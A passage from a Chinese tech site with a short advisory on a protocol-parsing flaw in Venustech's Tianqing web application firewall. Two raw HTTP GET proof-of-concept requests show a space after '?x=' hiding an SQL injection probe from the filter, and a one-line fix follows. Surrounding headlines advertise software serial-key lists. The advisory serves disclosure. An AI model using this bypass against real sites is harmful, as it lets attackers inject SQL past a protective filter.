- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 6PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 7Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9Intel i7-9700K性能跑分曝光:同代提升約12%
- 10XP系統怎么清除緩存?
- 11Intel Z390主板有望10月8日公布:8核9代酷睿隨后登場
- 12XP系統安裝chrome無法找到入口怎么處理?
[摘要]啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。 Serv...
啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。
Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &id=16 HTTP/1.1中參數&id=16前面的空格獲取id=16這個參數,例如下數據包返回網頁正常:
GET /news.jsp?x= &id=16 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Connection: close
Host: www.test.com
Pragma: no-cache
與http://www.test.com/news.jsp?id=16返回網頁相同。
而啟明星辰天清Web應用安全網關解析協議時,會忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數,從而繞過防護。
例直接訪問:http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會攔截
構造如下poc繞過:
GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Connection: close
Host: www.test.com
Pragma: no-cache
修復方案:
正確解析http請求第一行中 url參數帶空格字符后的參數
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
推薦資訊 總人氣榜
